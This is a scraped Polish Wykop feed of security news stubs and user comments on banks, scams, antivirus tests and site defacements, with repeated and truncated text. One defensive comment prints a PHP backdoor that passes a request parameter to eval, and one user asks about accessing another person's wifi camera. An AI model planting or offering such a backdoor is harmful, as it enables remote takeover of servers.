Treść przeznaczona dla osób powyżej 18 roku życia...
Wszystko
Najnowsze
Archiwum
McAfee od dziś (4 kwietnia) ponownie samodzielną firmą
Samodzielność McAfee to efekt wspólnej inwestycji amerykańskiego funduszu TPG i Intela. Firmy stworzyły samodzielny podmiot w sektorze cyberbezpieczeństwa, który korzystać może z pokaźnego kapitału i zasobów operacyjnych i technologicznych. Zgodnie z zapowiedziami, Intel utrzymał 49-proc....
z- 0
- #
- #
- #
- #
- #
- #
mając dostęp do czyjejś kamerki wifi po telnecie w jaki sposób mogę uzyskać obraz z tej kamerki? ( ͡° ͜ʖ ͡°)
@ppidd_: po telnecie to chyba obraz w formacie ASCII ;)
Antywirus Microsoftu równa w górę
Microsoft Security Essentials (MSE) pozytywnie zaskoczył podczas ostatnich testów skanerów antywirusowych. Okazało się, że jego najnowsza edycja sprawuje się lepiej niż wiele znanych płatnych programów zabezpieczających.
z- 1
- #
- #
- #
- #
- #
- #
Wykonanie dowolnego kodu na iPhone / iPad przez WiFi? Apple patchuje
Krytyczna luka CE w iPhone/iPad.
z- 0
- #
- #
- #
- #
@prezydent_wykopu: wystarczy, że w jednym pliku php zostało np:
I już masz problem, bo ten plik wywoła agresor z odpowiednimi parametrami i zainfekuje serwer na nowo... niestety przerabiałem.
Są różne wariacje tego (z if'ami, wiele spacji aby ukryć, i naprawdę dużo dodatkowych opcji, tylko dla POST, lub tylko dla GET), polecam przeszukać wszystkie pliki php pod względem słowa "eval" i
php $post_var = "req"; if(isset($_REQUEST[$post_var])) { eѵal(stripslashes($_REQUEST[$post_var])); exit(); }; ?I już masz problem, bo ten plik wywoła agresor z odpowiednimi parametrami i zainfekuje serwer na nowo... niestety przerabiałem.
Są różne wariacje tego (z if'ami, wiele spacji aby ukryć, i naprawdę dużo dodatkowych opcji, tylko dla POST, lub tylko dla GET), polecam przeszukać wszystkie pliki php pod względem słowa "eval" i
@Al_Bundy: Po rejestracji wrzucasz wygenerowany dla Ciebie plik uwierzytelniający na ftp i koniec :)
Jak dyrektor FBI został zdeanonimizowany przez dziennikarkę?
Kilkoma prostymi trickami…
z- 1
- #
- #
- #
- #
- #
- #
Dyrektor FBI chciał ukryć się w internecie, ale popełnił błąd i został zdeanonimizowany. Oto klilka wskazówek jak namierzać "tajne" profile w mediach społecznościowych. Jeśli macie jakieś swoje fejk-konto (albo multi ( ͡° ͜ʖ ͡°)), weźcie sobie te rady do serca.
https://niebezpiecznik.pl/post/jak-dyrektor-fbi-zostal-zdeanonimizowany-przez-dziennikarke-kilkoma-prostymi-trickami/
#niebezpiecznik #security #bezpieczenstwo #prywatnosc #inwigilacja #instagram #twitter i taki troche pseudo #hacking
https://niebezpiecznik.pl/post/jak-dyrektor-fbi-zostal-zdeanonimizowany-przez-dziennikarke-kilkoma-prostymi-trickami/
#niebezpiecznik #security #bezpieczenstwo #prywatnosc #inwigilacja #instagram #twitter i taki troche pseudo #hacking
@niebezpiecznik-pl: Te ostatnie rady, to nie musiałem tego wyczytać na niebezpieczniku, bo dla mnie były oczywiste. Czy nadaję się na szefa FBI?
@Prezes_roku: Tak, jeśli nie będziesz się stosował do tych rad.
Wiadomości TVP popłynęły w komentarzu do afery KNF - i to srogo.
http://www.wykop.pl/link/3678489/jak-wiadomosci-tvp-oklamuja-widzow-w-sprawie-afery-knf/
#bezpieczenstwo #security
PS. Jesteśmy parę lat na Wykopie ale najwyraźniej nie uważaliśmy na lekcjach, bo dalej trudno nam zrozumieć, dlaczego chyba solidnie udokumentowane kłamstwo jest zakopywane jako "informacja nieprawdziwa". Chyba lepiej nie będziemy się zbyt długo nad tym zastanawiać :)
http://www.wykop.pl/link/3678489/jak-wiadomosci-tvp-oklamuja-widzow-w-sprawie-afery-knf/
#bezpieczenstwo #security
PS. Jesteśmy parę lat na Wykopie ale najwyraźniej nie uważaliśmy na lekcjach, bo dalej trudno nam zrozumieć, dlaczego chyba solidnie udokumentowane kłamstwo jest zakopywane jako "informacja nieprawdziwa". Chyba lepiej nie będziemy się zbyt długo nad tym zastanawiać :)
@ZaufanaTrzeciaStrona: na wykopie logiki się nie doszukujcie
SEIZED SITE
just checked the md5 in the description :D
z- 1
- #
- #
- #
- #
- #
- #
Zatrzymać atak insiderski
Ataki insiderskie, czyli celowe zarażenia sieci lub systemów przez osoby, które mają legalny dostęp do nich stają się coraz powszechniejsze, a ich liczba stale rośnie. Tego typu działalność może stanowić większe zagrożenie niż ataki z zewnątrz.
z- 2
- #
- #
- #
- #
- #
Treść przeznaczona dla osób powyżej 18 roku życia...
Komentarz usunięty przez autora
@dolOfWK6KN: Filtr na L7 na pliki typu .exe com dll pdf vbs wsf a jak grasz ostro to jeszcze js
Mirktzy, wie ktoś coś więcej o FreeSSL od Symanteca?
Czy to faktycznie będzie darmowe? Bo na dole same triale ale możliwe że chcą żeby ten darmowy SSL przyciągał ruch i liczą na 'dosprzedaż' tych pozostałych rozwiazań.
Wiem że afera była u nich ostatnio ale nadal jednak Symantec wydaje mi się wiarygodniejszy niż Let's Encrypt :F
Co
Czy to faktycznie będzie darmowe? Bo na dole same triale ale możliwe że chcą żeby ten darmowy SSL przyciągał ruch i liczą na 'dosprzedaż' tych pozostałych rozwiazań.
Wiem że afera była u nich ostatnio ale nadal jednak Symantec wydaje mi się wiarygodniejszy niż Let's Encrypt :F
Co
źródło: comment_LKWc394KuGPkwua15pN3kqX3Bv2zO4vW.jpg
Pobierz@Saeglopur: wiarygodniejszy może dla Ciebie ;) Chrome będzie co innego sądził... Zresztą SSL DV to żadna różnica od jakiego dostawcy, byle miał pokrycie w przeglądarkach
Źle się dzieje w Banku Idea - spływa do nas nad wyraz dużo opisów incydentów. Niektórym nawet znika $$$. Dlaczego?
https://niebezpiecznik.pl/post/ideabank-myli-numery-rachunkow-nie-prosi-o-haslo-ogranicza-dostepnosc-historii-i-z-kont-klientow-pobiera-wielokrotnosci-transakcji-czyli-naszych-czytelnikow-dziwne-przypadki/
#banki #ideabank #security #bezpieczenstwo #hacking #niebezpiecznik
https://niebezpiecznik.pl/post/ideabank-myli-numery-rachunkow-nie-prosi-o-haslo-ogranicza-dostepnosc-historii-i-z-kont-klientow-pobiera-wielokrotnosci-transakcji-czyli-naszych-czytelnikow-dziwne-przypadki/
#banki #ideabank #security #bezpieczenstwo #hacking #niebezpiecznik
@niebezpiecznik-pl: generalnie Idea Bank ma problem ze starym systemem (były przypadki lokat dostępnych w starym systemie, które według tabeli oprocentowania nie istniały, np tu w komentarzach). Z nowy zresztą też - interfejs Clouda jest tragiczny i samo załadowanie trwa wieki (o ile nie rzuci 500tką). Migracja ze starego do nowego powinna być dawno zakończona a, jak widać, ciągle trwa... od kilku lat :)
PS. Swoją drogą zdarza się też
PS. Swoją drogą zdarza się też
źródło: comment_R7sARWJy7JQ7psE8UYcWVhoxLSJyXN47.jpg
Pobierz
Znalazł dziurę w banku Millennium, która pozwalała kraść dane innych klientów. Zgłosił i usłyszał: ale nie wolno zmieniać parametrów w URL! :D O tym co było dalej, w artykule:
https://niebezpiecznik.pl/post/bank-millenium-mial-blad-umozliwiajacy-pobieranie-polis-z-danymi-osobowymi-innych-klientow/
#millennium #banki #security #hacking #bezpieczenstwo #niebezpiecznik
https://niebezpiecznik.pl/post/bank-millenium-mial-blad-umozliwiajacy-pobieranie-polis-z-danymi-osobowymi-innych-klientow/
#millennium #banki #security #hacking #bezpieczenstwo #niebezpiecznik
@niebezpiecznik-pl
Kraść też nie wolno, a ludzie kradną!
Kraść też nie wolno, a ludzie kradną!
nie wolno zmieniać parametrów w URL!
@niebezpiecznik-pl: faktycznie, to działa xD
http://www.wykop.pl/mikroblog/hot/ostatnie/3/ gorące 3h
http://www.wykop.pl/mikroblog/hot/ostatnie/2/ gorące 2h
http://www.wykop.pl/mikroblog/hot/ostatnie/1/ gorące 1h
Mireczki, uważajcie. Od wczoraj do Polaków wysyłane są takie SMS-y. Ostrzeżcie znajomych, żeby NIE wypisywali się z tej usługi. Bo nie muszą. A jak spróbują, to (dopiero wtedy) stracą 30PLN.
https://niebezpiecznik.pl/post/uwaga-na-sms-y-z-numeru-516087625-dotyczace-uslugi-maluch/
#oszukujo #security #bezpieczenstwo #niebezpiecznik #policja
https://niebezpiecznik.pl/post/uwaga-na-sms-y-z-numeru-516087625-dotyczace-uslugi-maluch/
#oszukujo #security #bezpieczenstwo #niebezpiecznik #policja
@balatka: wrzucanie swoich artykulow juz nie jest uznawane za spam? Co ten wykop...
@niebezpiecznik-pl: pamiętać, łaska wykopków na pstrym koniu jeździ. Nie wychylać się, bo skończycie jak Solgaz
Jeśli nie aktualizujecie serwera, trzymacie starą maszynę i do tego debugging na produkcji, to w końcu stroną zaczyna zarządzać ktoś z Pakistanu. Nawet na jakdojade.pl...
http://www.wykop.pl/link/3672345/wlamanie-na-jakdojade-pl-prawdopodobnie-skutkiem-niezalatanej-podatnosci/
#bezpieczenstwo #security
http://www.wykop.pl/link/3672345/wlamanie-na-jakdojade-pl-prawdopodobnie-skutkiem-niezalatanej-podatnosci/
#bezpieczenstwo #security
@ZaufanaTrzeciaStrona: ktoś nie wie o unattended-updates w debianach?
Włamanie na jakdojade.pl prawdopodobnie skutkiem niezałatanej podatności
Dzisiaj około godziny 20 spora część użytkowników smartfonów mogła poczuć się lekko zagubiona w swoich miastach, ponieważ włamywacze z Pakistanu podmienili stronę główną oraz kilka podstron popularnego serwisu JakDojade.pl.
z- 1
- #
- #
- #
- #
- #
- #
Producent zabawek przyczynił się do gigantycznego wycieku danych
Producent Spiral Toys wprowadził na rynek zabawki firmowane marką „Cloud Pets”, które łączą się z Internetem. Zabawka transmituje do sieci zapisy rozmów pomiędzy rodzicami i dziećmi. Producent nie zastosował odpowiednich zabezpieczeń, co przyczyniło się do wycieku 800 tysięcy danych użytkowników.
z- 1
- #
- #
- #
- #
- #
- #
Korea Północna jednym z największych źródeł cyberataków
Kojarząca się zazwyczaj z izolacją od reszty świata, biedą i zacofaniem, Korea Północna stała się w ostatnich latach jednym z największych źródeł cyberzagrożeń wskazują specjaliści w dziedzinie bezpieczeństwa. Ataki północnokoreańskich hakerów odczuwają nie tylko sąsiedzi z Korei Południowej.
z- 0
- #
- #
- #
- #
- #
- #
No dobra, to czekamy aż się znowu pojawi aby przynajmniej zobaczyć ciut więcej niż MAC (który może być fałszywy, ale wygląda